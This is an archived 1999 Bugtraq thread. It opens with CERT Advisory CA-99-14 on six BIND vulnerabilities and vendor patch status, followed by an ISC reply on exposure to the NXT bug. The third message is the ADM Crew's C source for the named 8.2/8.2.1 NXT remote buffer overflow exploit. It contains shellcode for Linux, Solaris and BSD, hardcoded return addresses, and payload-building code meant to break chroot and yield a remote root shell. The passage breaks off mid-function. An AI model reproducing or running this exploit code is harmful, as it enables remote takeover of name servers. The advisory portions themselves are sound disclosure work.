4479340 1999-11-11 21:36 /314 rader/ Postmaster Mottagare: Bugtraq (import) <8482> Ärende: CERT Advisory CA-99.14 - Multiple Vulnerabilities in BIND ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Message-ID: <19991111100313.E8197@underground.org> Date: Thu, 11 Nov 1999 10:03:13 -0800 Reply-To: Aleph One <aleph1@UNDERGROUND.ORG> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Aleph One <aleph1@UNDERGROUND.ORG> X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CERT Advisory CA-99-14 Multiple Vulnerabilities in BIND Original release date: November 10, 1999 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running various versions of BIND I. Description Six vulnerabilities have been found in BIND, the popular domain name server from the Internet Software Consortium (ISC). One of these vulnerabilities may allow remote intruders to gain privileged access to name servers. Vulnerability #1: the "nxt bug" Some versions of BIND fail to properly validate NXT records. This improper validation could allow an intruder to overflow a buffer and execute arbitrary code with the privileges of the name server. NXT record support was introduced in BIND version 8.2. Prior versions of BIND, including 4.x, are not vulnerable to this problem. The ISC-supplied version of BIND corrected this problem in version 8.2.2. Vulnerability #2: the "sig bug" This vulnerability involves a failure to properly validate SIG records, allowing a remote intruder to crash named; see the impact section for additional details. SIG record support is found in multiple versions of BIND, including 4.9.5 through 8.x. Vulnerability #3: the "so_linger bug" By intentionally violating the expected protocols for closing a TCP session, remote intruders can cause named to pause for periods up to 120 seconds. Vulnerability #4: the "fdmax bug" Remote intruders can consume more file descriptors than BIND can properly manage, causing named to crash. Vulnerability #5: the "maxdname bug" Improper handling of certain data copied from the network could allow a remote intruder to disrupt the normal operation of your name server, possibly including a crash. Vulnerability #6: the "naptr bug" Some versions of BIND fail to validate zone information loaded from disk files. In environments with unusual combinations of permissions and protections, this could allow an intruder to crash named. Other recent BIND-related vulnerabilities AusCERT recently published a report describing denial-of-service attacks against name servers. These attacks are unrelated to the issues described in this advisory. For information on the denial-of-service attacks described by AusCERT, please see AusCERT Alert AL-1999.004 available at: ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-1999.004.dns_dos II. Impact Vulnerability #1 By exploiting this vulnerability, remote intruders can execute arbitrary code with the privileges of the user running named, typically root. Vulnerabilities #2, #4, and #5 By exploiting these vulnerabilities, remote intruders can disrupt the normal operation of your name server, possibly causing a crash. Vulnerability #3 By periodically exercising this vulnerability, remote intruders can disrupt the ability of your name server to respond to legitimate queries. By intermittently exercising this vulnerability, intruders can seriously degrade the performance of your name server. Vulnerability #6 Local intruders who gain write access to your zone files can cause named to crash. III. Solution Apply a patch from your vendor or update to a later version of BIND Many operating system vendors distribute BIND with their operating system. Depending on your support procedures, arrangements, and contracts, you may wish to obtain BIND from your operating system vendor rather than directly from ISC. Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly. Appendix A. Vendor Information Vendor Name Caldera See ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current MD5s db1dda05dbe0f67c2bd2e5049096b42c RPMS/bind-8.2.2p3-1.i386.rpm 82bbe025ac091831904c71c885071db1 RPMS/bind-doc-8.2.2p3-1.i386.rpm 2f9a30444046af551eafd8e6238a50c6 RPMS/bind-utils-8.2.2p3-1.i386.rpm 0e4f041549bdd798cb505c82a8911198 SRPMS/bind-8.2.2p3-1.src.rpm Compaq Computer Corporation At the time of writing this document, Compaq is currently investigating the potential impact to Compaq's BIND release(s). As further information becomes available Compaq will provide notice of the completion/availability of any necessary patches through AES services (DIA, DSNlink FLASH and posted to the Services WEB page) and be available from your normal Compaq Services Support channel. Data General We are investigating. We will provide an update when our investigation is complete. Hewlett-Packard Company HP is vulnerable, see the chart in the ISC advisory for details on your installed version of BIND. Our fix strategy is under investigation, watch for updates to this CERT advisory in the CERT archives, or an HP security advisory/bulletin. IBM Corporation The bind8 shipped with AIX 4.3.x is vulnerable. We are currently working on the following APARs which will be available soon: APAR 4.3.x: IY05851 To Order APARs may be ordered using Electronic Fix Distribution (via FixDist) or from the IBM Support Center. For more information on FixDist, reference URL: http://aix.software.ibm.com/aix.us/swfixes/ or send e-mail to aixserv@austin.ibm.com with a subject of "FixDist". IBM and AIX are registered trademarks of International Business Machines Corporation. The Internet Software Consortium ISC has published an advisory regarding these problems, available at http://www.isc.org/products/BIND/bind-security-19991108.html The ISC advisory also includes a table summarizing which versions of BIND are susceptible to the vulnerabilities described in this advisory. OpenBSD As far as we know, we don't ship with any of those vulnerabilities. Santa Cruz Operation, Inc Security patches for the following SCO products will be made available at http://www.sco.com/security OpenServer 5.x.x, UnixWare 7.x.x, UnixWare 2.x.x Sun Microsystems Vulnerability #1 Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, and 7 are not vulnerable. Vulnerability #2 Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, and 7 are not vulnerable. Vulnerability #3 Solaris 2.3, 2.4, 2.5, 2.5.1, and 2.6 are not vulnerable. Sun will be producing patches for Solaris 7. Vulnerability #4 Solaris 2.3, 2.4, 2.5, 2.5.1, and 2.6 are not vulnerable. Solaris 7 is probably not vulnerable. We are still investigating. Vulnerability #5 Solaris 2.3, 2.4, 2.5, 2.5.1, and 2.6 are not vulnerable. Sun will be producing patches for Solaris 7. Vulnerability #6 Solaris 2.3, 2.4, 2.5, 2.5.1, and 2.6 are not vulnerable. Sun will be producing patches for Solaris 7. _________________________________________________________________ The CERT Coordination Center would like to thank David Conrad, Paul Vixie and Bob Halley of the Internet Software Consortium for notifying us of these problems and for their help in constructing the advisory, and Olaf Kirch of Caldera for notifying us of some of these problems and providing technical assistance and advice. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-99-14-bind.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Revision History November 10, 1999: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBOCo3W1r9kb5qlZHQEQIY9QCgjh17l5yAtNrLFSSj2EJ3HYUe8hgAoOol 1lRvWBJAlYs63OEqqJ+mCfr2 =bBA/ -----END PGP SIGNATURE----- (4479340) ------------------------------------------(Ombruten) 4482002 1999-11-12 18:12 /37 rader/ Postmaster Mottagare: Bugtraq (import) <8485> Ärende: Brev från "David R. Conrad" <David_Conrad@ISC.ORG> ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: BUGTRAQ@SECURITYFOCUS.COM X-Accept-Language: en,ja MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <382B1A1C.10F9E41B@isc.org> Date: Thu, 11 Nov 1999 11:33:48 -0800 Reply-To: "David R. Conrad" <David_Conrad@ISC.ORG> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: "David R. Conrad" <David_Conrad@ISC.ORG> Organization: Internet Software Consortium X-To: Anonymous <nobody@REPLAY.COM> X-cc: BUGTRAQ@SECURITYFOCUS.COM To: BUGTRAQ@SECURITYFOCUS.COM Hi, The problem is with the reception of NXT records, so it doesn't matter what you have in your own zone files. Any nameserver running versions 8.2, 8.2 patchlevel 1, or 8.2.1 can be susceptible to the attack (albeit there are some pre-conditions that must be met for the issue to even come up). We, of course, recommend upgrading. In addition, we recommend running your nameserver as non-root and chrooted (I know setting this up is non-trivial -- it'll be much, much easier in BINDv9). Rgds, -drc Anonymous wrote: > Ooh, those pesky NXT records. Like I process those every day. > Fascinating read in RFC 2535, but suppose I don't have any NXT > records in my own zones, under what circumstances will my DNS server > commit the sin of "the processing of NXT records"? In other words, > are all of us vulnerable (even caching-only name servers if so, I > imagine!), or only people with NXT records? This makes a big difference! (4482002) ------------------------------------------(Ombruten) 4482098 1999-11-12 18:42 /554 rader/ Postmaster Mottagare: Bugtraq (import) <8487> Ärende: Re: CERT Advisory CA-99-14 Multiple Vulnerabilities in BIND ------------------------------------------------------------ Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: BUGTRAQ@securityfocus.com Message-ID: <199911120943.KAA22607@sofuku.monster.org> Date: Fri, 12 Nov 1999 10:43:21 +0100 Reply-To: Anonymous <nobody@REPLAY.COM> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> Comments: This message did not originate from the Sender address above. I was remailed automatically by anonymizing remailer software Please report problems or inappropriate use to the remaile administrator at <abuse@replay.com>. From: Anonymous <nobody@REPLAY.COM> X-To: BUGTRAQ@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM /* * ADM CONFIDENTIAL -- (ADM Confidential Restricted when * combined with the aggregated modules for this product) * OBJECT CODE ONLY SOURCE MATERIALS * (C) COPYRIGHT ADM Crew. 1999 * All Rights Reserved * * This module may not be used, published, distributed or archived without * the written permission of the ADM Crew. Please contact your local sales * representative. * * ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez * * "a misanthropic anthropoid with nothing to say" * * thanks to stran9er for sdnsofw.c * * Intel exploitation is pretty straightforward.. should give you a remote * shell. The shellcode will break chroot, do a getpeername on all open * sockets, and dup to the first one that returns AFINET. It also forks and * runs a command in case the fd duping doesn't go well. Solaris/SPARC is a * bit more complicated.. we are going through a well trodden part of the * code, so we don't get the context switch we need to have it populate the * register windows from the stack. However, if you just hammer the service * with requests, you will quickly get a context switch at the right time. * Thus, the SPARC shellcode currently only breaks chroot, closes current * fd's and runs a command. * Also, the NetBSD shellcode doesn't break chroot because they stop the * dir tricks. Of course, they allow mknods in chrooted environments, so * if named is running as root, then it still might be expoitable. * The non-exec stack patch version returns into a malloc'ed buffer, whose * address can vary quite alot. Thus, it may not be as reliable as the other * versions.. * * We broke this just a little in order to raise the bar on using it * (just slightly).. If you'd like to test it on your own box, put a shell * in /adm/sh, or /adm/ksh for solaris on the target machine. */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <time.h> #include <string.h> #include <ctype.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <arpa/nameser.h> #include <netdb.h> char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x61,0x64,0x6d,0x2f, 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2, 0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7, 0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0, 0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0, 0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0, 0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d, 0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50, 0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80, 0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68, 0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65, 0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63, 0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65, 0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68, 0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65, 0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73, 0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a, 0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70, 0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31, 0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50, 0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8, 0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd, 0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a, 0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a, 0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38, 0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46, 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000}, {6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0} }; int arch=0; char *command=0; /* these two dns routines from dspoof/jizz */ /* pull out a compressed query name */ char *dnssprintflabel(char *s, char *buf, char *p) { unsigned short i,len; char *b=NULL; len=(unsigned short)*(p++); while (len) { while (len >= 0xC0) { if (!b) b=p+1; p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000); len=(unsigned short)*(p++); } for (i=0;i<len;i++) *(s++)=*(p++); *(s++)='.'; len=(unsigned short)*(p++); } *(s++)=0; if (b) return(b); return(p); } /* store a query name */ char *dnsaddlabel(char *p, char *label) { char *p1; while ((*label) && (label)) { if ((*label == '.') && (!*(label+1))) break; p1=strchr(label,'.'); if (!p1) p1=strchr(label,0); *(p++)=p1-label; memcpy(p,label,p1-label); p+=p1-label; label=p1; if (*p1) label++; } *(p++)=0; return(p); } void make_overflow(char *a) { int i; unsigned long *b; unsigned char *c; char sbuf[4096]; if (archlist[arch].safe==0) /* linux */ { memset(a,0x90,4134); memcpy(a+3500,archlist[arch].code,archlist[arch].codesize); if (command) strcpy(a+3500+archlist[arch].codesize, command); else strcpy(a+3500+archlist[arch].codesize, "exit"); b=(unsigned long*)(a+4134); for (i=0;i<20;i++) *b++=archlist[arch].ret; } else if (archlist[arch].safe==1) /* bsd */ { memset(a,0x90,4134); memcpy(a+3300,archlist[arch].code,archlist[arch].codesize); if (command) strcpy(a+3300+archlist[arch].codesize, command); else strcpy(a+3300+archlist[arch].codesize, "exit"); b=(unsigned long*)(a+4134); for 